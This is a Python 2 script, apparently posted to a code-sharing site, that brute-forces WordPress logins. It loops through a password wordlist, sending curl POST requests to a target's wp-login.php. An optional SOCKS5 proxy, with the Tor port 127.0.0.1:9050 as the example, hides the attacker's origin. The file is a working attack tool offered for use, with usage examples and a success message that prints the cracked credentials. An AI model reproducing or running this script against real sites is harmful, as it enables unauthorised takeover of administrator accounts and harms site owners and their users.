[Python] Wordpress Bruteforcer by TP2k1

1. # Wordpress Login Brute Forcer (without WPscan)
2. # Sending Curl requests we can found the login password..if the login failed Curl generates the requested output else any output is generated and so we know that the password is correct :)
3. # Author: TP2k1
4. #!/usr/bin/python
5.  
6. import os,sys,time,urllib2
7. os.system("rm wpbrute_output.html")
8. os.system("rm dir_list.txt")
9. os.system("clear")
10.  
11. try:
12. target = sys.argv[1]
13. username = sys.argv[2]
14. wlist = sys.argv[3]
15.  
16. except:
17. time.sleep(0.6)
18. print "+_________________________________________+"
19. print "| Wordpress Login Brute Forcer |"
20. print "| created by TP2k1 |"
21. print "+_________________________________________+\n"
22. time.sleep(1)
23. print "Usage: python wpbrute.py <target> <username> <wordlist> <proxy>\n"
24. print "Example1: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt"
25. print "Example2: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt '127.0.0.1:9050'\n"
26. sys.exit(1)
27.  
28. try:
29. proxy = sys.argv[4]
30. except:
31. proxy = "no"
32.  
33. if "http://" not in target:
34. target = "http://%s" %target
35.  
36. print "+_________________________________________+"
37. print "| Wordpress Login Brute Forcer |"
38. print "| created by TP2k1 |"
39. print "+_________________________________________+"
40. time.sleep(1)
41. print "\n ... Calculating number of words in '%s' ... " %wlist
42. time.sleep(1.3)
43.  
44. words = open(sys.argv[3],"r").readlines()
45.  
46. time.sleep(0.8)
47.  
48. print "\n [+] Words loaded => ", len(words)
49. time.sleep(1.3)
50.  
51. if proxy != "no":
52. print " [+] Proxy loaded => '%s'\n" %proxy
53.  
54. else:
55. print "\n"
56.  
57. time.sleep(1.1)
58. print " ... Bruteforcing Wordpress login ... \n"
59. time.sleep(1.5)
60.  
61.  
62. for word in words:
63. word = word.replace('\r','').replace('\n','')
64.  
65.  
66. print ".. Trying => '%s:%s' " %(username,word)
67.  
68. if proxy != "no":
69. curl = "curl -s --socks5 %s --url '%s/wp-login.php' -A 'Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(proxy,target,username,word,target)
70.  
71. else:
72. curl = "curl -s --url '%s/wp-login.php' -A 'Mozilla/2.0 (compatible; MSIE 6.0; Windows NT 5.2)' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(target,username,word,target)
73.  
74. ls = "ls -l > dir_list.txt"
75.  
76. os.system(curl)
77. os.system(ls)
78.  
79. cfile = open("dir_list.txt","r")
80. cfile_read = cfile.read()
81. cfile.close()
82.  
83. if "wpbrute_output.html" in cfile_read:
84. #print "\n_________________________________________"
85. #print ".. Login not bruteforced :( "
86. ofile = open("wpbrute_output.html","r")
87. ofile_read = ofile.read()
88. ofile.close()
89. os.system("rm wpbrute_output.html")
90.  
91. if "Invalid username" in ofile_read or ("Nome de usu" in ofile_read and "inv" in ofile_read and "lido." in ofile_read) or "Nome utente non valido" in ofile_read:
92. print ".. Invalid username!\n"
93. sys.exit(1)
94. #print "________________________________________\n"
95.  
96. else:
97. print "\n__________________________________________________________"
98. print "..+ Login bruteforced --> '%s:%s'" %(username,word)
99. print "__________________________________________________________\n"
100. sys.exit(1)